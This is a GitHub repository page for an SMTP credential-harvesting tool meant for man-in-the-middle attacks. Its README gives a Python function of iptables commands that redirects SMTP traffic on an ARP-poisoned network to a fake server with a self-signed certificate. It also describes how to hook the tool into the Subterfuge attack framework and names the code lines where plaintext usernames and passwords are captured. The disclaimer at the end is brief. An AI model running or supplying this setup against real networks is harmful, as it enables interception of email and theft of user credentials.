Skip to content
/ jjsmtp-listener Public

A script helping to listen to outgoing mails with a fake certificate. Originally created for man-in-the-middle attacks on networks, works well with subterfuge.

0 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

jj-studio/jjsmtp-listener

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
certs
certs
 
 
.gitignore
.gitignore
 
 
README.md
README.md
 
 
__init__.py
__init__.py
 
 
jjsmtp.py
jjsmtp.py
 
 

Repository files navigation

jjsmtp-listener

mitm-smtp-listener acts as a SMTP-server with a self-signed certificate, however behaves differently at certain points of the ESMTP protocol in order to eavesdrop on the username and password.
It was originally developed for man-in-the-middle attacks on networks and works well with Subterfuge, an automated man-in-the-middle attack framework.

Setup

The following steps are explained for Subterfuge, however should work in any other man-in-the-middle attack scenario. Assuming we have an ARP poisoned network in which all traffic passes our machine, we have to redirect all TCP traffic bound for SMTP ports (25, 465, 587) to our twisted reactor. For Subterfuge, do this using iptables in the file attackctrl.py. The function iptablesconfig should look like this:

def iptablesconfig():
    os.system('iptables -F')
    os.system('iptables -X')
    os.system('iptables -t nat -F')
    os.system('iptables -t nat -X')
    os.system('iptables -t mangle -F')
    os.system('iptables -t mangle -X')
    os.system('iptables -P INPUT ACCEPT')
    os.system('iptables -P FORWARD ACCEPT')
    os.system('iptables -P OUTPUT ACCEPT')
    time.sleep(1)
    os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 	10000')

   	# THIS IS WHERE THE SMTP PORTS ARE ROUTED TO OUR REACTOR 
    print "SMTP Prerouting configuration"
    os.system('iptables -t nat -A PREROUTING -p tcp --dport 25 -j REDIRECT --to-port    9998')
    os.system('iptables -t nat -A PREROUTING -p tcp --dport 465 -j REDIRECT --to-port    9997')
    os.system('iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-port    9996')
   
    time.sleep(1)
    print "Iptables Prerouting Configured\n"
    
    print 'Configuring System...'
    os.system('sysctl -w net.ipv4.ip_forward=1')
    print "IP Forwarding Enabled."

Next, when everything has been set up, import jjmail
from jjmail import jjsmtp
and tell it to set up everything:
jjsmtp.configureSMTPTraffic()

In Subterfuge, this is done in sslstrip.py, right after reactor.listenTCP(int(listenPort), strippingFactory).

Relaying mails

There is no implementation of listening to which SMTP-server any mail is actually bound for. Thus all messages must be sent via a relay server of your choice. For this, enter your credentials in lines 33 to 36 in jjsmtp.py.

Getting the credentials

Raw-Text username rolls in on line 161, raw-text password rolls in on line 166. Do whatever you want, but please be careful!

ATTENTION

Performing MITM attacks on networks is an illegal act. Use only for testing/academic purposes.

About

A script helping to listen to outgoing mails with a fake certificate. Originally created for man-in-the-middle attacks on networks, works well with subterfuge.

Resources

Readme
Activity
Custom properties

Stars

0 stars

Watchers

2 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages